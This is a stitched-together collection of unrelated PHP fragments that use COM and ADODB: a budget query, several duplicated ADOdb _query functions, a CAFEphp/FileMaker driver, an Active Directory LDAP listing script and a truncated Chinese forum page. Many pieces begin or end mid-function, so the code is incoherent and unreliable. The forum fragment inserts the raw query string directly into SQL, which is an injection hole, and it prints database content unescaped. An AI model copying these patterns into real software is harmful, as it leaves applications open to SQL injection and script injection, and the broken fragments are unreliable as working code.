$Data = $conn->Execute("select THANG,KDSATKER,sum(TOTNILMAK) AS jml from M_SPMIND.DBF group by THANG,KDSATKER");
$th_file = $Data->Fields(0);
$kdsatker_data = $Data->Fields(1);
$jumlah = $Data->Fields(2);
/*
echo "<strong> Tersambung SAKPA Tahun ".$th." Satker ".$kdsatker_data." </strong></<br>";
echo "<strong> Jumlah Realisasi ".$jumlah." </strong></<br>";
if ($kdsatker_input <> $kdsatker_data ){
$_SESSION['errmsg'] = "Pilihan Satker berbeda dengan Data yang tersedia"; ?>
<meta http-equiv="refresh" content="0;URL=index.php?p=<?php echo $p_next ?>"><?php
exit();
} # END CEK FOLDER DAN DATA
function &_query($sql, $inputarr = false)
{
$dbc = $this->_connectionID;
// return rs
if ($inputarr) {
$oCmd = new COM('ADODB.Command');
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
foreach ($inputarr as $val) {
// name, type, direction 1 = input, len,
$this->adoParameterType = 130;
$p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val);
//print $p->Type.' '.$p->value;
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if ($dbc->Errors->Count > 0) {
return false;
}
return $rs;
}
$rs = @$dbc->Execute($sql, $this->_affectedRows);
if ($dbc->Errors->Count > 0) {
return false;
}
return $rs;
}
function doQuery($action)
{
// Note that because of the way in which CAFEphp and FileMaker are implemented, CAFEphp must be running on the same
// machine that is serving as the web server. (You'll note that PHP creates a COM object which looks for a locally
// running application.) For this same reason, the server IP and port are irrelevant.
$availableActions = array('-delete', '-edit', '-find', '-findall', '-new', '-sqlquery');
if (!in_array(strtolower($action), $availableActions)) {
// first off, toss out any requests for actions NOT supported under CAFEphp
return new FX_Error("The action requested ({$action}) is not supported in CAFEphp.");
}
$CAFEphp_res = new COM('CAFEphp.Application');
// although username and password are optional for this function, FX.php expects them to be set
if ($CAFEphp_res == false) {
return new FX_Error('Unable to load to CAFEphp.');
}
if (defined("DEBUG") and DEBUG or DEBUG_FUZZY) {
$currentDebugString = "<p>CAFEphp version: " . $CAFEphp_res->Version() . "</p>\n";
$this->FX->lastDebugMessage .= $currentDebugString;
if (defined("DEBUG") and DEBUG) {
echo $currentDebugString;
}
}
$theResult = $CAFEphp_res->Connect($this->FX->database, $this->FX->DBUser, $this->FX->DBPassword);
if ($theResult != 0) {
$CAFEphp_res->EndConnection();
switch ($theResult) {
case -1:
return new FX_Error('Unable to connect. Be sure the FileMaker database and CAFEphp are running.');
break;
case -2:
return new FX_Error('Certificate not present. You MUST have a certificate.');
break;
case -3:
return new FX_Error('Certificate is corrupt.');
break;
case -4:
return new FX_Error('CAFEphp is not running or the demo version has expired.');
break;
case -5:
return new FX_Error('The current demo of CAFEphp has expired.');
break;
default:
return new FX_Error('An unknown error has occured while attempting to create the COM object.');
break;
}
}
switch ($action) {
case '-delete':
case '-edit':
case '-find':
case '-findall':
case '-new':
$this->FX->dataQuery = $this->BuildSQLQuery($action);
if (FX::isError($this->FX->dataQuery)) {
return $this->FX->dataQuery;
}
case '-sqlquery':
// note that there is no preceding break, as we don't want to build a query
if (substr(trim($this->FX->dataQuery), 0, 6) == 'SELECT') {
$currentSelect = true;
$theResult = $CAFEphp_res->Query($this->FX->dataQuery, $this->FX->groupSize);
} else {
$currentSelect = false;
$theResult = $CAFEphp_res->Execute($this->FX->dataQuery);
}
if ($theResult < 0) {
$CAFEphp_res->EndConnection();
switch ($theResult) {
case -1:
return new FX_Error('No CAFEphp connection for the query.');
break;
default:
return new FX_Error('An unknown error occured during the query.');
break;
}
}
$this->FX->foundCount = $theResult;
$theResult = $CAFEphp_res->FieldCount();
if ($theResult < 0) {
$CAFEphp_res->EndConnection();
switch ($theResult) {
case -1:
return new FX_Error('No CAFEphp connection for the field count.');
break;
case -2:
return new FX_Error('No query was performed for a field count.');
break;
default:
return new FX_Error('An unknown error occured during the query.');
break;
}
} else {
$currentFieldCount = $theResult;
}
for ($i = 0; $i < $currentFieldCount; ++$i) {
$theResult = $CAFEphp_res->FieldName($i);
if ($theResult == '$-CAFEphpNOCONNECTION') {
$CAFEphp_res->EndConnection();
return new FX_Error("No CAFEphp connection while retieving the name of field {$i}.");
} elseif ($theResult == '$-CAFEphpNOQUERY') {
$CAFEphp_res->EndConnection();
return new FX_Error("CAFEphp returned a \"No Query\" error while retieving the name of field {$i}.");
} elseif ($theResult == '$-CAFEphpUNKNOWNERROR') {
$CAFEphp_res->EndConnection();
return new FX_Error("CAFEphp returned an unknown error while retieving the name of field {$i}.");
}
$this->FX->fieldInfo[$i]['name'] = $theResult;
$this->FX->fieldInfo[$i]['type'] = 'NO DATA';
$this->FX->fieldInfo[$i]['emptyok'] = 'NO DATA';
$this->FX->fieldInfo[$i]['maxrepeat'] = 'NO DATA';
$this->FX->fieldInfo[$i]['extra'] = '';
}
if ($currentSelect) {
$tempRow = array();
for ($i = 0; $i < $this->FX->foundCount; ++$i) {
for ($j = 0; $j < $currentFieldCount; ++$j) {
$theResult = $CAFEphp_res->FieldValue($j);
if ($theResult == '$-CAFEphpNOCONNECTION') {
$CAFEphp_res->EndConnection();
return new FX_Error("No CAFEphp connection while retieving the value of field {$i} for record {$j}.");
} elseif ($theResult == '$-CAFEphpNOQUERY') {
$CAFEphp_res->EndConnection();
return new FX_Error("CAFEphp returned a \"No Query\" error while retieving the value of field {$i} for record {$j}.");
} elseif ($theResult == '$-CAFEphpUNKNOWNERROR') {
$CAFEphp_res->EndConnection();
return new FX_Error("CAFEphp returned an unknown error while retieving the value of field {$i} for record {$j}.");
}
if (!$this->FX->useInnerArray) {
$tempRow[$this->FX->fieldInfo[$j]['name']] = $theResult;
} else {
$tempRow[$this->FX->fieldInfo[$j]['name']] = array($theResult);
}
if ($this->FX->fieldInfo[$j]['name'] == $this->FX->primaryKeyField) {
$currentKey = $value;
}
}
if ($this->FX->genericKeys || $this->FX->primaryKeyField == '') {
$this->FX->currentData[] = $tempRow;
} else {
$this->FX->currentData[$currentKey] = $tempRow;
}
$theResult = $CAFEphp_res->MoveNext();
if ($theResult < 0) {
$CAFEphp_res->EndConnection();
$next = $i + 1;
switch ($theResult) {
case -1:
return new FX_Error('No CAFEphp connection while moving from record {$i} to {$next}.');
break;
case -2:
return new FX_Error('There was no current query while moving from record {$i} to {$next}.');
break;
default:
return new FX_Error('An unknown error occured while moving from record {$i} to {$next}.');
break;
}
}
}
}
break;
default:
return new FX_Error("The action requested ({$action}) is not supported in CAFEphp.");
break;
}
$this->FX->fxError = 0;
return true;
}
function _query($sql,$inputarr=false)
{
try { // In PHP5, all COM errors are exceptions, so to maintain old behaviour...
$dbc = $this->_connectionID;
// return rs
$false = false;
if ($inputarr) {
if (!empty($this->charPage))
$oCmd = new COM('ADODB.Command',null,$this->charPage);
else
$oCmd = new COM('ADODB.Command');
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
while(list(, $val) = each($inputarr)) {
$type = gettype($val);
$len=strlen($val);
if ($type == 'boolean')
$this->adoParameterType = 11;
else if ($type == 'integer')
$this->adoParameterType = 3;
else if ($type == 'double')
$this->adoParameterType = 5;
elseif ($type == 'string')
$this->adoParameterType = 202;
else if (($val === null) || (!defined($val)))
$len=1;
else
$this->adoParameterType = 130;
// name, type, direction 1 = input, len,
$p = $oCmd->CreateParameter('name',$this->adoParameterType,1,$len,$val);
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if ($dbc->Errors->Count > 0) return $false;
return $rs;
}
$rs = @$dbc->Execute($sql,$this->_affectedRows, $this->_execute_option);
if ($dbc->Errors->Count > 0) return $false;
if (! $rs) return $false;
if ($rs->State == 0) {
$true = true;
return $true; // 0 = adStateClosed means no records returned
}
return $rs;
} catch (exception $e) {
}
return $false;
}
$objCommand->Properties["Chase Referrals"] = False;
//DEFAULT = False
//$objCommand->Properties["Column Names Only"] = True; //DEFAULT = False
//$objCommand->Properties["Deref Aliases"] = False; //DEFAULT = False
$objCommand->Properties["Page Size"] = 999;
//GET AROUND AD'S 1000 RECORD (DEFAULT)LIMIT AND PAGENATES RESULTS
$objCommand->Properties["SearchScope"] = 2;
//DEFAULT = ADS_SCOPE_SUBTREE(aka 2) (http://msdn.microsoft.com/en-us/library/aa772286%28v=vs.85%29.aspx)
//$objCommand->Properties["Size Limit"] = 0; //DEFAULT = No Size Limit (An integer value that specifies the size limit for the search. For Active Directory, the size limit specifies the maximum number of returned objects.)
//$objCommand->Properties['Sort On']->Value = "name"; //DEFAULT = No Sorting (aka none)
$objCommand->Properties["Time Limit"] = 0;
//DEFAULT = No Time Limit (An integer value that specifies the time limit, in seconds, for the search.)
$objCommand->Properties["Timeout"] = 0;
//DEFAULT = No Time Out (An integer value that specifies the client-side timeout value, in seconds.)
$Cmd = "<LDAP://192.168.1.1>;(objectClass=*);adspath;Subtree";
//YOUR AD SEVER HERE | FQDN or IP
$objCommand->CommandText = $Cmd;
$objRecordSet = $objCommand->Execute();
$OrderNumber = 0;
while (!$objRecordSet->EOF()) {
$OrderNumber++;
$adspath = $objRecordSet->Fields['adspath']->Value;
echo $adspath . "<br>";
$objRecordSet->MoveNext();
}
$objRecordSet->Close();
//$objCommand->Close() ;
$objConnection->Close();
unset($objRecordSet);
unset($objCommand);
unset($objConnection);
function &_query($sql, $inputarr = false)
{
try {
// In PHP5, all COM errors are exceptions, so to maintain old behaviour...
$dbc = $this->_connectionID;
// return rs
if ($inputarr) {
if (!empty($this->charPage)) {
$oCmd = new COM('ADODB.Command', null, $this->charPage);
} else {
$oCmd = new COM('ADODB.Command');
}
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
foreach ($inputarr as $val) {
// name, type, direction 1 = input, len,
$this->adoParameterType = 130;
$p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val);
//print $p->Type.' '.$p->value;
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if ($dbc->Errors->Count > 0) {
return false;
}
return $rs;
}
$rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option);
if ($dbc->Errors->Count > 0) {
return false;
}
if (!$rs) {
return false;
}
if ($rs->State == 0) {
return true;
}
// 0 = adStateClosed means no records returned
return $rs;
} catch (exception $e) {
}
return false;
}
textarea{overflow-y:visible;width:98%;}
div{display:inline-block;background:#219ECE;margin:2px;padding:2px;border-radius:4px 4px 4px 4px;}
section{padding:5px;background:#188A84;color:#fff;}
section h1{margin:13px;font-size:2em;}
footer{margin: 0 0 0 15px;color:#fff;}
footer a:link,
footer a:visited{color:#fff;border-bottom:1px dotted #fff;}
</style>
</head>
<body>
<?php
if ($id = $_SERVER['QUERY_STRING']) {
//列出当前纸片的内容
$rs = $conn->Execute("select * from infinite where id=" . $id);
$rs2 = $conn->Execute("select * from infinite where parents_id=" . $rs->Fields['parents_id']->Value);
?>
<section>
<h1><?php
echo $rs->Fields['content']->Value;
?>
</h1>
<footer>
<?php
echo $rs->Fields['reply_count']->Value;
?>
个回复
来自<a href="?<?php